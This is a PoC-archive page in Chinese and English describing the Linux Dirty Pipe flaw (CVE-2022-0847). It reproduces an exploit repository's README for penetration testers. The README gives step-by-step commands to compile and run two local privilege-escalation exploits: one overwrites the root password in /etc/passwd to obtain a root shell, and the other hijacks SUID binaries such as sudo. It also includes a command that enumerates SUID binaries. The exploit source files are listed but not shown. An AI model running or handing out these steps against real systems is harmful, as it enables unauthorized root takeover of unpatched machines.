关联漏洞
标题:
Linux kernel 安全漏洞
(CVE-2022-0847)
描述:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在安全漏洞,该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。以下产品和版本受到影响:Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102。
介绍
# CVE-2022-0847-DirtyPipe-Exploits
A collection of exploits and documentation for penetration testers and red teamers that can be used to aid the exploitation of the Linux Dirty Pipe vulnerability.
# About The Vulnerability
- Dirty Pipe (CVE-2022-0847) is a local privilege escalation vulnerability in the Linux kernel that could potentially allow an unprivileged user to do the following:
- Modify/overwrite arbitrary read-only files like /etc/passwd.
- Obtain an elevated shell.
## Affected versions
- Linux kernel versions newer than 5.8 are affected.
- So far the vulnerability has been patched in the following Linux kernel versions:
- 5.16.11
- 5.15.25
- 5.10.102
- You can learn more about the vulnerability here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
# DirtyPipe Vulnerability Scanner
- If you are not sure if a target system is vulnerable, use this really cool bash script developed by @basharkey.
- DirtyPipe Checker: https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
## Compiling the exploit
- An automated compiler bash script has been provided to you to automate the compilation of both exploits.
- In order to compile the exploit succesfully, you will need to have GCC installed.
```
sudo apt-get install gcc
```
- After installing GCC, you can run the 'compile.sh" script as follows:
```
chmod +x compile.sh
```
```
./compile.sh
```
# Exploit-1 - Modifying/overwriting read only files
- This repo contains 2 exploits, the 'exploit-1.c' exploit can be used to modify or overwrite arbitrary read only files.
- This exploit is a proof of concept that was developed by Max Kellermann and has been modified to change the root password in the /etc/passwd file, consequently providing you with access to an elevated shell.
## Running the exploit binary
- The exploit code has already been configured to replace the root password with the password "piped" and will take a backup of the /etc/passwd file under /tmp/passwd.bak. Furthermore, the exploit will also provide you with an elevated root shell and will restore the original passwd file when done.
```
./exploit-1
```
# Exploit-2 - Hijacking SUID binaries
- This exploit can be used to inject and overwrite data in read-only SUID process memory that run as root.
## Finding SUID binaries
```
find / -perm -4000 2>/dev/null
```
## Running the exploit binary
```
./exploit-2 /usr/bin/sudo
```
## Important Note
- I do not claim credit/ownership/disclosure of the vulnerability and all corresponding exploits hosted in this GitHub repo.
- All the credit goes to the awesome Max Kellerman, you can check out the official disclosure here: https://dirtypipe.cm4all.com/
## Credits
- https://github.com/febinrev/dirtypipez-exploit
- https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
文件快照
[4.0K] /data/pocs/345054694b4f51008ed9edd7772f8bb125004c3f
├── [ 71] compile.sh
├── [5.2K] exploit-1.c
├── [7.6K] exploit-2.c
└── [2.9K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。